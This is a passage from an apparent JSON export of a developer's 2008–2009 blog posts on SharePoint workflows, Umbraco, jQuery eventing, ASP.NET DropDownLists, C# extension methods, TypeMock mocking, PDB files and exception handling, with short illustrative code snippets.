required.\n*Edit - As Keith has pointed out I had a mistake, there is no name indexer on SPWorkflowAssociationCollection. I was coding from memory and thought I had it right, guess not. I've updated the example to what it should be. 
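While I'm at it, here's a rough sketch of how the Web-scoped Feature idea could hang together as a feature receiver. Treat it as a hedged illustration rather than the code from the project: the class and namespace names are made up, the association name is the same illustrative one as above, the AssociationData XML is still omitted, and the lookup simply reuses the call from the corrected example.

using Microsoft.SharePoint;
using Microsoft.SharePoint.Publishing;
using Microsoft.SharePoint.Workflow;

namespace Example.Workflows
{
    // Sketch only: a Web-scoped feature receiver that applies pre-built
    // AssociationData to the Pages list of a new publishing site.
    public class WorkflowAssociationFeatureReceiver : SPFeatureReceiver
    {
        public override void FeatureActivated(SPFeatureReceiverProperties properties)
        {
            SPWeb web = properties.Feature.Parent as SPWeb;
            if (web == null)
                return; // only meaningful when the feature is activated at the Web scope

            PublishingWeb pubWeb = PublishingWeb.GetPublishingWeb(web);

            // Same lookup as the corrected example above; the name is illustrative.
            SPWorkflowAssociation wfa = pubWeb.PagesList.GetWorkflowAssociationByName("Parallel Approval");

            wfa.AssociationData = @"..."; // the approver XML, omitted as above
            pubWeb.PagesList.UpdateWorkflowAssociation(wfa);
            pubWeb.PagesList.Update();
        }

        // WSS 3.0 declares the receiver methods as abstract, so the rest need
        // overrides even though they do nothing here.
        public override void FeatureDeactivating(SPFeatureReceiverProperties properties) { }
        public override void FeatureInstalled(SPFeatureReceiverProperties properties) { }
        public override void FeatureUninstalling(SPFeatureReceiverProperties properties) { }
    }
}

The feature itself would be scoped to Web in its feature.xml, which lines up with the manual "activate it on each new site" step described above.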
I should stop blogging from memory if it wasn't the day I wrote the code :P\n", "id": "2009-02-22-programmatically-modifying-sharepoint-workflows" }, { "title": "Umbraco 4 broke my project!", "url": "https://www.aaron-powell.com/posts/2009-02-05-umbraco-4-broke-my-project/", "date": "Thu, 05 Feb 2009 00:00:00 +0000", "tags": [ "umbraco" ], "description": "", "content": "Umbraco 4 may have been out for a week now but I've been busy and I am only slowly getting to upgrading a project I've been working on to the current build.\nBut I finally got around to it, and because there's a big custom .NET component to it I compiled against the upgraded DLL's, but there was a problem, I got the following compile error:\nThe referenced assembly 'businesslogic, Version=1.0.3317.32687, Culture=neutral, PublicKeyToken=null' could not be found. This assembly is required for analysis and was referenced by: 'MyProject.dll', 'cms.dll'.\nWell that's no good, and from looking at the cms.dll it's right, it expects that, but businesslogic.dll is only version 1.0.3317.17186.\nCrap.\nSo I re-download the package, may I did something wrong. Nope, that's not it. So I check another person running v4 final. Nope, that's not it.\nCrap!\nSo I create a new project, add the references. This one compiles.\nCrap!!\nThen I take a closer look at the output window; doing this I see that the problem is caused during the running of FxCop. Then it hits me, FxCop is trying to bring in all the references, probably via reflection. Because cms.dll is using a difference version it then freaks out!\nNo one else was using FxCop, nor was the new project I created!\nWell there you have it, if you're doing development againt the Umbraco API's be careful that they have released the correct versions to you!\n", "id": "2009-02-05-umbraco-4-broke-my-project" }, { "title": "Umbraco Interaction Layer v1.0 available", "url": "https://www.aaron-powell.com/posts/2009-02-01-umbraco-interaction-layer-v10-available/", "date": "Sun, 01 Feb 2009 00:00:00 +0000", "tags": [ "umbraco", "Umbraco.InteractionLayer" ], "description": "", "content": "Well it's been 6 months since I first announced the Umbraco Interaction Layer project, but I'm happy to announce that v1.0 is available on the CodePlex site for download!\n*Pauses for dramatic effect*\nThe v1 release supports Umbraco 4.0.0 and Umbraco 3.0.x.\nThe following are the major changes between the UIL RC and v1.0 release:\nFixed the DataContractAttribute so it is now included on all generated classes (I didn't realise it wasn't inherited!) Pluralised names of the generated LINQ interfaces are now more likely to be correct English DocTypeBase has a Published property on it so it's easier to check the state of a document Speaking of having v4 support one thing I wasn't initally aware of with v4 was the nested DocType feature. I'm happy to announce that this is supported in the UIL release (for v4). It's not quite as nice as I'd like (it doesn't use class inheritance), the properties from a parent DocType are just included on the child.\nThere are some known limitations which are:\nGenerated properties are using the underlying database type, which does mean that DataTypes such as Content Picker and Media Picker will generate an int property not a URL, string or custom-class property The underlying Umbraco interface is provided by umbraco.cms.businesslogic.web.Document. This means that the access is directly with the Umbraco database not the umbraco.config xml files. 
I strongly recomment that when you are getting an existing object that you load via the Version GUID of the umbraco.presentation.nodeFactory.Node object. This will ensure you are loading the current published verion. When loading from the integer ID you will load the last saved version  When generating a class which a child relationship you need to include the child DocType to ensure that the LINQ interface is generated. The generation engine is unable to generate a child relationship of it isn't also generating the class for the child at the same time. This problem is also compounded by the fact there isn't any way to view the child relationships from the dashboard UI for generating classes  \nI really would love to hear from anyone who does have a play with the UIL, good and bad feedback.\nI'm going to be looking at the v-next version soon so I will be looking for feedback of areas to improve or implement.\nAnd one last thing, get LINQ-ing with Umbraco!\n", "id": "2009-02-01-umbraco-interaction-layer-v10-available" }, { "title": "Custom eventing with jQuery", "url": "https://www.aaron-powell.com/posts/2009-01-31-custom-eventing-with-jquery/", "date": "Sat, 31 Jan 2009 00:00:00 +0000", "tags": [ "jquery", "javascript" ], "description": "", "content": "Last Thursday I attended a session through Victoria.NET on jQuery hosted by Damian Edwards.\nIt was a good beginner session on jQuery, I was familiar with most of it but there were a few sweet little gems shown.\nDuring the session when Damian was talking about eventing with jQuery someone asked him a question about doing custom events. Damian wasn't sure how to go about this, or if it was possible.\nWell it is possible and I'll go over how to achieve it.\nBecause of jQuery's nature it's very easy to add custom events to both dom objects and custom objects.\njQuery has lots of events built in, via the click(), keydown(), etc. But ultimately they all implement the bind() method. The just provide click, keydown, etc as the type argument of the method.\nBut bind() can take anything as a type argument, try this:\n$('p').bind('HelloWorld', function() { alert('Hello World event called'); }); Now all <p /> tags on the page have an event called HelloWorld which is just waiting to be called, so how do we do that?\n$('a').click(function() { $('p').triggerHandler('HelloWorld'); }); Yep, the triggerHandler() method will call any of the event handlers which are bound to the objects in the selector.\nObviously this is a bit of a sanitised example, doing that on all elements isn't exactly useful. But it does show that it can be done. With more powerful selectors it's quite possible to set up events similar to using the $addHandler() method within the ASP.NET AJAX library, like is done within the controls in the AJAX Control Toolkit.\nIt also means that it would be quite possible to set up a Client Event Pool similar to what I talked about in the recent post Fun with a Client Event Pool and modal popups.\n", "id": "2009-01-31-custom-eventing-with-jquery" }, { "title": "Not getting DropDownList value when setting it via JavaScript", "url": "https://www.aaron-powell.com/posts/2009-01-30-not-getting-dropdownlist-value-when-setting-it-via-javascript/", "date": "Fri, 30 Jan 2009 00:00:00 +0000", "tags": [ "asp.net", "ajax", "javascript", "jquery" ], "description": "", "content": "So today I had a problem which was doing my head in. I had a form which has a bunch of DropDownLists on it, some of which are disabled (depending on the radio button selection). 
Regardless of whether the DropDownList was available I needed to read the value (which was often set via JavaScript) back on the server.\nBut I noticed that the value I was setting via JavaScript wasn't making it way back to the server if I read the dropDownList.SelectedValue property.\nHmm I said to myself, I looked at the form, it's setting the value right. The \"selected\" attribute was on the right option tag, but the value still isn't on the server.\nIf I had set the value by clicking on it and selecting a value it was making it back.\nHmm...\nThen I realised, the difference between the two actions was the DropDownList wasn't enabled in one of them, and when it wasn't it was enabled the value wasn't making it back.\nShit, that's it! When a DropDownList isn't enabled .NET seems to disregard the submitted value when loading the ViewState!\nBut the solution is simple:\n$(document).ready(function() { $('#submitButton').click(function() { $('select').removeAttr('disabled'); }); }); jQuery makes it super easy to find all the drop down lists and then make them enabled before the form submits.\nHere's another example of how to do it if you're using client-side validation and you want to make sure it's passed:\n$(document).ready(function() { $('#submitButton').click(function() { if( Page_IsValid ) $('select').removeAttr('disabled'); }); }); Page_IsValid is the client variable updated with the result of the client side validation.\n", "id": "2009-01-30-not-getting-dropdownlist-value-when-setting-it-via-javascript" }, { "title": "Comment feeding and more dogfood", "url": "https://www.aaron-powell.com/posts/2009-01-29-comment-feeding-and-more-dogfood/", "date": "Thu, 29 Jan 2009 00:00:00 +0000", "tags": [ "ajax" ], "description": "", "content": "Well I've been doing some more changes to my website (and not breaking it... much :P) and I've finally got round to adding a feature that Ruben was nagging for, a comment RSS feed.\nNow it's easier to stay up to date with the comments that are bouncing around posts (in particular like we saw on the recent post around extension methods.\nI also decided to dogfood an old post I did about client side templating, so to go with a new comment RSS I have updated the comment engine to use jTemplates, and I've also added Gravatar. Proof that I haven't been taking your email addresses just for sale to spam companies ;).\nMy blog has never looked so polished!\nAs any Umbraco developers are (or should be) aware Umbraco 4 ships this Friday, which is Saturday for us people in the future. I plan to be hot on the heals of the v4 release with v1 of the Umbraco Interaction Layer. I've been doing a lot of work with it and on it recently. 
There's been a number of bug fixes, but now it's in a stable condition with one bug which I'm still to fix (go on, generate a doc type with a child relationship to a doctype which has a name ending in \"y\", it gets a bit funny there!).\n", "id": "2009-01-29-comment-feeding-and-more-dogfood" }, { "title": "Are extensions really evil?", "url": "https://www.aaron-powell.com/posts/2009-01-25-are-extensions-really-evil/", "date": "Sun, 25 Jan 2009 00:00:00 +0000", "tags": [ "generic .net" ], "description": "", "content": "Ruben (of Umbraco fame) recently wrote a post entitled Extension Methods: Silent static slaves which was in response to a comment I'd left on a previous post about static classes and static method being evil.\nIf you haven't read Ruben post then I suggest you do before continue on with mine as a lot of what I'll be saying is in counter argument to him (including the comments).\nDone? Good, continue on!\nRuben has produced a demo which is great for illistrating his point, but is it an example of good design turning bad or just bad design from the start?\nThe first thing I want to look at is that his extension methods are on the interface and implementation class.\nThis is bad design to start with, but it's not just bad design if you're using extension methods, this could manifest itself as bad design if you did it as helper methods in a separate class, eg:\nclass Helpers {\npublic static int CalculateShoeCount(Animal animal) {\n//do processing\n}\npublic static int CalculateShoeCount(Monkey animal) {\n//do processing\n}\n}\nSo this would fall into the same trap if we don't re-cast Animal to Monkey before calling the helper.\nBut does this prove Ruben's initial point, that static's are just plain evil?\nWell no, design isn't possible without statics. If you try and design without statics you end up with nothing but instance memebers. If that's the case where do I find the current method int.TryParse, does this become 0.TryParse?\nRuben's demo is an example of bad design producing worse design. In good design the CalculateShoeCount would be a member of the Animal interface, particularly since the implementation changes per interface implementation type.\nSo how can we use extension methods to produce good design? Well first you really need to understand what an extension method is. As Ruben quite correctly pointed out an extension is just syntactic suger and extension methods should be treated as such. Developers need to understand that extension methods are only designed to provide functionality to a classes public instance members; they are stateless.\n(This is why I don't understand why so many people of Stack Overflow want extension properties added to the compiler, this is where people are missing the point of the extension concept)\nAnd if you're expecting a stateful nature from the extension methods then you've missed their goal.\nLets look at some good examples of using extension methods. Here's a fav of mine for Umbraco:\npublic static string Url(this Node node) {\nreturn umbraco.library.NiceUrl(node.Id);\n}\n(Hey look, a static calling a static ;)).\nOr how about this one:\npublic static IEnumerable<ListItem> SelectedItems(this ListControl ctrl) {\nreturn ctrl.Items.Cast<ListItem>().Where(item => item.Selected);\n}\nNow we're using an extension method with an extension method.\nBut both of these examples are using actual class implementations, not interfaces, does that make a difference?\nYes, and a big one. 
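The difference comes down to namespacing, which is spelled out just below; as a rough sketch first (the Animal/Monkey names echo Ruben's demo, but everything else here, the namespaces and members, is invented purely for illustration): keep the interface extensions in one namespace and the implementation extensions in another, so a caller only pulls in the behaviour they ask for.

// Sketch only: names are illustrative, not from Ruben's demo code.
namespace Zoo.Core
{
    public interface IAnimal
    {
        int Legs { get; }
    }

    public class Monkey : IAnimal
    {
        public int Legs { get { return 2; } }
        public int Arms { get { return 2; } }
    }
}

namespace Zoo.Core.Extensions
{
    using Zoo.Core;

    // Extensions that are valid for any IAnimal.
    public static class AnimalExtensions
    {
        public static int CalculateShoeCount(this IAnimal animal)
        {
            return animal.Legs;
        }
    }
}

namespace Zoo.Monkeys.Extensions
{
    using Zoo.Core;

    // Monkey-specific extensions; only in scope when this namespace is imported.
    public static class MonkeyExtensions
    {
        public static int CalculateShoeCount(this Monkey monkey)
        {
            return monkey.Legs + monkey.Arms;
        }
    }
}

With them split like this a caller imports the generic behaviour, the monkey-specific behaviour, or both, and it's obvious at the top of the file which one is in play.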
When you are putting extensions on an interface there needs to be no possibility of confusion about what the extensions are for. And if you are also providing an extension of an implementation of the class they need to be in separate namespaces. If they aren't, you will end up with what Ruben shows, misrepresentation of the methods abilities.\nIQueryable<T> is a perfect example of how to use extension methods on top of an interface. If you have a look at the construct of the interface there's actually no constructs within it! This means that \"all\" the functionality is provided by extension methods, allowing anyone to write their own extensions.\nIf I was to not include the namespace System.Linq I can then write my own query extensions, eg a Where that does return a bool, or negate operators which I don't want to support.\n \nSo in my opinion extension methdos are no more evil than anything else in programming; they can easily be abused and misused, but find something that it'd not possible to misuse to prove bad design.\n", "id": "2009-01-25-are-extensions-really-evil" }, { "title": "It's still cool to pick on Microsoft", "url": "https://www.aaron-powell.com/posts/2009-01-25-its-still-cool-to-pick-on-microsoft/", "date": "Sun, 25 Jan 2009 00:00:00 +0000", "tags": [ "random" ], "description": "", "content": "This is going to deviate from my standard brain dribble a bit and be more of an opinion piece.\nSo recently the EU has announced it is going to fine Microsoft again because Internet Explorer comes with Windows and isn't that lovely. This comes on the back of the fine they slapped on them last year for anti-competative behavior.\nSo Microsoft is still popular punching bag, I'm sure most people remember when Microsoft was found and fined for monopolistic behavior.\nI'm like any other web developer and find that IE is a constant thorn in my side, particularly IE 6, but truth be told I don't mind IE 7 as a browser. I use it primarily at work (FF is way to slow for quick load and I just can't get excited about Chrome), and I don't have any problems with it. Sure the web dev tools are well behind Firebug, but the IE 8 tools really do look sweet, a complete Firebug rip-off, but every browser is doing that these days.\nSo if Microsoft is being sued because they are bundling a browser with their operation system (I smell Opera behind the push from the EU) it has me wondering about another company and their practices. 
That company would be Apple and here's a fact, they too supple a browser with their OS, Safari.\nLike IE on Windows, Safari on OS X is lightning fast, compared to Firefox and Opera; like IE on Windows it's well embeded into the the OS; but unlike IE on Windows it's heavily tied to the browser version.\nDid you know you can't run Safari 3 on OS X 10.4, nor can you run Safari 2 on OS X 10.5 (which I found out the hard way).\nWhat about the iPhone, the cool kid on the block, and a kid who's cornering the 3G phone market, Apple's decided to allow third party browsers through the AppStore, (if you believe the rumors) but this is after the argument which was produced when a leaked Opera tried to be submitted.\nAnd I'm not even going to look at the iPhone SDK EULA in regards to writing software (small hit, check out whether or not you can have a JIT compiler ;)).\nCan you see the point I'm making, interesting isn't it, Apple is starting to look a lot like Microsoft did 15 years ago.\nSure, Apple doesn't have the market share that Microsoft commands, but it really is facinating just how much bundled software comes on a new Mac:\niTunes (for Music and iPod syncing) iCal (calendard software) Address Book (contact management) Mail (POP, Exchange, etc) Quicktime (Video) Preview (for PDF) And the list really does go on (but does include trials of iWork and Microsoft Office for Mac).\nWith Apples market share growing, Microsoft not really concerned about people installing Windows on a Mac (despite what the Apple marketing team wants you to believe), do you think that they should be worred? Are Apple going to become the next company which it is cool to pick on?\n", "id": "2009-01-25-its-still-cool-to-pick-on-microsoft" }, { "title": "Twitterific", "url": "https://www.aaron-powell.com/posts/2009-01-25-twitterific/", "date": "Sun, 25 Jan 2009 00:00:00 +0000", "tags": [ "random" ], "description": "", "content": "Well I'm a whore in all it's forms now (well, actually it's been that way for a while), I'm a twitter-er.\nYou'll find my occational tweets here.\nI don't really find the appeal of twitter, I particularly don't understand the appeal of using it for something other than an outdated form of IRC.\nBut oh well, if you want to, there I am.\n", "id": "2009-01-25-twitterific" }, { "title": "Apologies to my loyal fans", "url": "https://www.aaron-powell.com/posts/2009-01-21-apologies-to-my-loyal-fans/", "date": "Wed, 21 Jan 2009 00:00:00 +0000", "tags": [ "random" ], "description": "", "content": "Just a quick apology to anyone who has tried to submit a comment to my blog since I did the site refresh.\nPart of my new code base around the comment submission was not working so I have not received any comment submissions since then.\nSo no, I haven't just been ignoring you ;)\nIt also means I found 2 new bugs in the UIL which I need to address before I can put v1 out!\nPlease feel free to resubmit your comments as I do enjoy reading them. Also, if you don't have a \"thank you\" message show after attempting to submit a comment it failed. 
If you're using Firebug you'll be able to see the web service response and I would like to see it so I can address the problem.\nYou can drop me an email on:\nme (at) aaron hyphen powell (dot) com\n", "id": "2009-01-21-apologies-to-my-loyal-fans" }, { "title": "Fun with a Client Event Pool and modal popups", "url": "https://www.aaron-powell.com/posts/2009-01-17-fun-with-a-client-event-pool-and-modal-popups/", "date": "Sat, 17 Jan 2009 00:00:00 +0000", "tags": [ "ajax" ], "description": "", "content": "I read an article last year about implementing a Client Event Pool and I really liked the concept. Joel shows a very good way to use it but I've been doing my best to find a logical use for it myself.\nAnyone not familiar with the concept of a Client Event Pool it's covered in Joel's post, but the short version is that a Client Event Pool is a browser-level event handler which is designed to allow events to be easily passed between unlinked components.\nOne component can raise an event which can be chosen to be handled by any other. Inversly events can be listened for even if the component isn't on the page or the event isn't used.\nThis isn't really a new concept, you can achieve it (to a certain extent) with standard ASP.NET, with the OnClient<EventName> which is on a lot of the standard ASP.NET controls.\nAnd in this article I'm going to look at how to integrate a Client Event Pool with the ASP.NET AJAX Control Toolkit's Modal Popup.\nNow, don't get me wrong, this isn't the only way to add the events to a modal popup control, there are a lot of event handlers which can be added without a Client Event Pool.\nThis all came about when I was tasked with integrating a login, forgotten password and change password component. Each were their own modal popups and each were separate .NET UserControls. I wasn't involved with developing any of them, and I didn't want to really do much to modify any of them too much and introduce more bugs in the system by screwing around with stuff I'm not familiar with.\nBecause they are all separate I didn't have a real way to pass the ID of the control that was to make the popup appear. Oh, and to make thing more complicated there were 2 links for each popup, sadly the Modal Popup doesn't support multiple controls to do the poping-up (or as far as I'm aware...)\nI also didn't want each of the popups to overlay each other, it doesn't really look that good (as I'll show shortly), so I needed a way to hide the master popup when the child was shown, and then when the child was hidden I want the master to reappear.\nSo I'm doing 3 basic controls for my example, a Login control:\na Forgotten Password control:\na Registration control:\nAnd add a dash of CSS and you get a lovely little popup:\n(Ok, so my design skills aren't great!)\nSo now it's time to tie up the master control with the child controls. 
To do this I'm going to have 2 events raised from the child controls, one for when the popup is shown and one for when it is hidden.\nI'm also going to have an event which can be raised elsewhere on each child control which will initiate the showing of the popup (you could add one for the hiding, but I'm using the inbuilt hiding from the CancelControlID property of the modal popup).\nFor each they will look as follows:\nLets have a look at how they work, first off I locate the the Sys.Component instance of the ModalPopup control.\nThere are showing and hiding events fired off from the ModalPopup, so I'm going to add a handler, the handler though will just be a stub which in-turn raises an event within our Client Event Pool. I've given them names which will indicate what they are used for.\nLastly I'm going to add an event handler so anyone can raise an event which will show the popup.\nNow lets have a look in the Login control:\nThe first 2 lines of this is adding event handlers to the links on the control. All they do is tell the Client Event Pool to raise an event, an event which I previously set up to be consumed by the child controls.\nNext we set up the Client Event Pool to listen for the hide and show events from our child controls.\nIt listens for the events to be raised and when they are it'll either hide or show the modal on the current page.\nAdmittedly I've gone a little bit overboard with my events between the two child controls. Each could just raise events like hideParent and showParent, and then I would only need 2 handlers against the Client Event Pool, but to illistrate my point I've gone the verbos method.\nNow I've gone for having the popups showing like this:\nTo this:\nAdmittedly static images can't really show how it works, but it's much nicer to not overlay popups, and ability to having popups automatically hiding and showing the loss-of-focus ones is a really sweet idea.\nI'll admit that it's possible to do this without the need for a Client Event Pool, you can expose all the appropriate properties on the child controls which then can be set appropriately within it's parent, but think of it a step further, if you wanted a link on the Forgot Password to the Registration page. Because they aren't really aware of each other it is very difficult to achieve (but not impossible). Your UserControl can also expose wrappers to the Showing and Hiding client events on the modal popup, but it still has the same problem as mentioned previously.\nAnd there we have it, a nice little example of how to use a Client Event Pool to make it easier to link previously unlinked components in a soft way.\nThe source code for this article can be found here.\n", "id": "2009-01-17-fun-with-a-client-event-pool-and-modal-popups" }, { "title": "Programmatically moving Umbraco nodes", "url": "https://www.aaron-powell.com/posts/2009-01-15-programmatically-moving-umbraco-nodes/", "date": "Thu, 15 Jan 2009 00:00:00 +0000", "tags": [ "umbraco" ], "description": "", "content": "The other month Ruben did a post on using the new Umbraco event model and today I had to solve a problem which it seemed like it would be the best way.\nI needed to have a document, when published, moved into a new folder (as we're using Umbraco to store some data used for some non-browsable data). 
This can be achieved with the old IActionHandler.Execute method, but it was a little problematic: you needed some way to check whether it was running because you had moved and republished, or because of the initial publish.\nLuckily, the Umbraco v4 event model makes this really nice and easy. Well, slightly easier, there's a few things that are still a bit of a pain, but it's not a problem with Umbraco, more a by-design limitation.\nSo let's get into some code.\npublic class ActionHandler : ApplicationBase { public ActionHandler(){ Document.BeforePublish += new EventHandler(Document_BeforePublish); } protected void Document_BeforePublish(Document sender, PublishedEventArgs e){ try { MyDocType dt = new MyDocType(sender); if(dt.SomeField == \"stillToMove\") { e.Cancel = true; dt.ParentId = 1234; dt.SomeField = \"it's moved!\"; dt.Save(true); }\n} catch (DocTypeMissMatchException) { } } } So I've used the UIL to generate a class representation of my docType (aptly named MyDocType :P) and from that I'm having to check a field on the document. This could be anything from a standard field to the parent ID to the published state.\nThe really nice part about using the event handler is that I can stop the current publish action. This improves performance and reduces database hits.\nYou can do this without the UIL, but because of some of the built-in features of the UIL it can be easily used to detect the correct docType. There's no need for magic numbers (and I'm sure a better way to pass the new parent ID can be thought up!).\nSo all in all I think that the new event model can have some really powerful aspects to it, it provides much more flexibility and event variety than IActionHandler.Execute.\n", "id": "2009-01-15-programmatically-moving-umbraco-nodes" }, { "title": "Site refresh, now with more dog food", "url": "https://www.aaron-powell.com/posts/2009-01-12-site-refresh-now-with-more-dog-food/", "date": "Mon, 12 Jan 2009 00:00:00 +0000", "tags": [ "umbraco" ], "description": "", "content": "Any astute visitors to my website will have noticed a few changes today. And for those who didn't I don't really blame you, they aren't that obvious.\nFirst off, I've upgraded my site to be running Umbraco 4 RC 1. It's been out for a while so I thought it was time I joined the hip crowd and started running it. I have been using it since Beta 2 on another site, but now I have my own running it as well.\nSecondly I have refreshed the home page, no longer does it have a pointless blurb, now it shows the latest blog post.\nThirdly I have removed most of the AJAX loading from the blog component. I wrote it originally as a bit of a trial-and-error to see if I could do it, but it was really quite pointless, and ultimately a real bitch to deal with. Plus it rendered the site useless when you had JavaScript turned off!\nI've kept it for the comment submission because I was simply too lazy to re-write the whole thing last weekend, as odd as it may seem I do leave my computer sometimes!\nAdditionally I have changed the URLs to actually work with the standard Umbraco URLs. Now the post permalinks are the URLs generated from Umbraco, and you can navigate to months via the folder URL. Categories still work off a query-string parameter, but getting around that is more effort than I could be bothered with!\nFourthly I am finally Dog Fooding with the UIL on this site. 
I wrote the blog engine with custom classes to represent my doc types originally, but now I have started using the UIL to provide it all.\nI'm really happy at the way it did work as well and am preparing for a new release of the UIL, but I have also found some limitations with it which I will be addressing when looking at the v-Next of the UIL.\nSo I'm quite happy with the way it came together, even if it did take a hell of a lot longer to do this refresh than I had originally hoped (good thing the better half was busy for most of the weekend so I'm not in too much trouble!).\n", "id": "2009-01-12-site-refresh-now-with-more-dog-food" }, { "title": "Dude, where's my Canvas?", "url": "https://www.aaron-powell.com/posts/2009-01-05-dude-wheres-my-canvas/", "date": "Mon, 05 Jan 2009 00:00:00 +0000", "tags": [ "umbraco" ], "description": "", "content": " Although there's been big praise for the Umbraco 4 RC release, and after I upgraded a site I'm working on to it, I had high hopes. One of the things I wanted to really play with is Canvas (formerly Live Edit). But it wasn't to be, when ever I went to load up Canvas there was nothing happening. Well, I had a few points which I could see I needed to click on, but clicking them did nothing.\nNor was I able to see the Canvas Toolbar which is always shown in the demos. Hmm, now that's not right... So I whipped out the source for Umbraco, and got debugging. But oddly enough none of the break points within the associated Umbraco Canvas controls were being hit. I had a UmbracoContext, and it was telling me Canvas was enabled.  And I kept digging, and then I noticed the folly of my mistake. I wasn't referencing the base Umbraco master page! There are two options: Set your master page to have a master of /umbraco/default.master and wrap your entire master page in a ContentPlaceholder with the ContentPlaceholderID of ContentPlaceHolderDefault Inherit your master page from umbraco.presentation.masterpages._default instead of System.Web.UI.MasterPage (this is my prefered option) There's still another bug which I am yet to find the cause of, when you have a macro which programmatically adds a file to the pages ScriptManager it doesn't work at all, the added file doesn't get added...\nI'm still digging on that one... Oh, and I noticed that the ItemEditor class inherits UpdatePanel, good thing we don't expect peak performance from Canvas :P ", "id": "2009-01-05-dude-wheres-my-canvas" }, { "title": "A month with TypeMock", "url": "https://www.aaron-powell.com/posts/2008-12-24-a-month-with-typemock/", "date": "Wed, 24 Dec 2008 00:00:00 +0000", "tags": [ "unit testing" ], "description": "", "content": " A month ago I did a post about the TypeMock mocking framework and the nice people at TypeMock were kind enough to give me a 1 year license for their software. Although I haven't really played with it as much as I hoped/ would have liked I have done a bit with it and though I'd share some thoughts. To have a bit of a base line I was doing my playing with both Typemock and RhinoMocks, just to have an example against a good free mocking framework. Where Typemock rocks The most exciting aspect of Typemock for me is that I can mock anything (well, nearly anything, you can't mock things from within mscorlib), and I mean anything. With the SharePoint aspect TypeMock really advertises that you can mock the SharePoint libraries as they are, meaning that you don't need source code access or anything. What do I mean by this? Well take RhinoMocks for example. 
RhinoMocks is built on top of the Castle projects DynamicProxy2 component. This means that if you're wanting to set up expected returns your methods are required to be virtual. This can be a problem if you're mocking an external framework (ie - SharePoint). But because TypeMock doesn't used DynamicProxy2 you don't have this limitation.  So with the demos which I was watching and reading with TypeMock on SharePoint it got me thinking, could I mock Umbraco? And you know what, I can! This is really exciting, when I was developing the Umbraco Interaction Layer I really wanted it to be unit tested, but due to limitations within Umbraco this mean I wasn't able to use something like RhinoMocks, because I needed to setup expected returns on method calls which weren't virtual (although I could download the source and modify that myself it defeats the concept of supporting a standard Umbraco release). So I got playing with TypeMock and low and behold I was able to set up some basic mocks to make fake data types! The code is currently POC-level and won't be going into the CodePlex project (I feel it is unfair that I put a licensed product up when the UIL is a free product), but still it is a very interesting concept and something I plan to look deeper into. I also have found that TypeMock can be a whole lot easier to set up mock returns, because the parameters are completely ignored when making a method call you can be a bit more careless in your mock setup.  Lastly TypeMocks ability to mock the construction of objects without public constructors is really nifty. Again this has great advantages when mocking with external libraries like SharePoint and Umbraco. Where TypeMock doesn't rock Although I stated that I like that I don't have to really worry about the parameters being passed into the method this is also a bit of a drawback. If you had a method that you want different returns depending on the method input (say, something doing a calculation) this is something that I so far haven't been able to work out how to achieve. By contrast this can be done in RhinoMocks as you need to provide a valid method parameter that you will then use when calling for the mock. Is it worth the money? This is a difficult question to answer, primarily because I haven't played with TypeMock enough. I really think that it's more of a case of \"depending what you're doing\". I can see that TypeMock is really great if you're wanthing to mock the results from an external library like SharePoint, Umbraco (or I'm sure even SiteCore ;). Also I see TypeMock is great to add mocking after the fact to a project. You may be will into development, many of the project API's are already set up, ready for use but you want to now go down the TDD path (it's never too late to start!). In this case going back and redoing all methods to be virtual is not really viable. But TypeMock's non-reliance on virtual methods for mock results does mean you can achieve TDD without major refactoring. ", "id": "2008-12-24-a-month-with-typemock" }, { "title": "PDB != Product Deployable Bits", "url": "https://www.aaron-powell.com/posts/2008-08-22-pdb-not-equal-product-deployable-bits/", "date": "Mon, 22 Dec 2008 00:00:00 +0000", "tags": [ "generic .net", "random" ], "description": "", "content": " Something else I see all too often at work (although not as often as not understanding the difference between client and server) is the existance of the PDB file on a production web server. 
PDB files are automatically created from Visual Studio through the .NET compilers, so why don't they belong on the production server? First we need to look at what is the PDB file? The PDB, or program database is a file generated from the .NET compilers which contains debugging information about the generated assembly or executable. I'm sure you've seen when you run code on your local machine and receive an exception and then a stack trace which pin-points the line of code which the error was thrown from.\nBut when you run that same error on a production server all your stack trace states is the method. And that's the vision of the PDB. The PDB maintains the information about where it was compiled. So now that we know what is a PDB, why shouldn't it be on a production server? You could be mistaken for thinking that the PDB is a good idea to have on a production system. After all, when ever something does go wrong on a production system you want to get all the information you can, as quickly as you can. The user who generated the error wont often be able to give you all the information you require, and your error-producing method could be very long with several locations where the error may have come from (which kind of leads back to my previous post on catching System.Exception). But to produce the additional information comes at a significant cost. Have you ever attached a debugger in Visual Studio onto a process? Next time you do watch the symbol loading list, or try doing it just after restarting IIS and notice the time it takes for a request just to happen. Then compare that to the first request after restarting an IIS without PDB files. This is why PDB's don't belong on, performance. If every time a page is requested it has to load the information into memory about all the .NET components on the page that's a lot of overhead. And for the most part (or so you'd hope) the information isn't required, it's only required for the worst case scenario. But you shouldn't delete your production PDBs! The above statement is very true, if we're deploying into a production environment we need some way to reproduce the errors that are produced there and receive the complete debugging information. This means that when deployment is done the PDB's should always be backed up, stored and backup again!\nThe PDB is a window into the soul of the code. Without it there is no way to get the debugging information back.\nThis is where the Microsoft Symbol Servers come into play but that's a story for another time ;) ", "id": "2008-08-22-pdb-not-equal-product-deployable-bits" }, { "title": "Should you catch System.Exception?", "url": "https://www.aaron-powell.com/posts/2008-12-18-should-you-catch-system-exception/", "date": "Thu, 18 Dec 2008 00:00:00 +0000", "tags": [ "generic .net" ], "description": "", "content": " System.Exception is a funny class, it's a class that on its own isn't really that practical. In the talk that Brian Abrams talk on Framework Design Guidelines from PDC 2008 (a really interesting video) he mentions that if they could do it over again they would make System.Exception an abstract class. And I completely agree. I hate nothing more than seeing code like this: throw new Exception(\"Something bad happened!\"); This line of code does not provide any insight into what has happened to produce the exception (ok, sure it's out of context, but I'm sure you've seen that used in context somewhere). 
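To make the contrast concrete, here's a small hedged example of my own (the EmailSender type and its message are invented, not taken from any code being discussed) showing the same sort of failure surfaced through a specific exception type instead:

using System;

// Illustrative type only: the point is the exception, not the class.
public class EmailSender
{
    private readonly string smtpHost;

    public EmailSender(string smtpHost)
    {
        if (string.IsNullOrEmpty(smtpHost))
        {
            // The type says what kind of thing went wrong and the message says why,
            // which is far more useful than new Exception("Something bad happened!").
            throw new ArgumentException("An SMTP host must be provided before emails can be sent.", "smtpHost");
        }

        this.smtpHost = smtpHost;
    }
}

A caller can now catch ArgumentException (or let it bubble up) and know it's a configuration problem, rather than fishing through a generic Exception.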
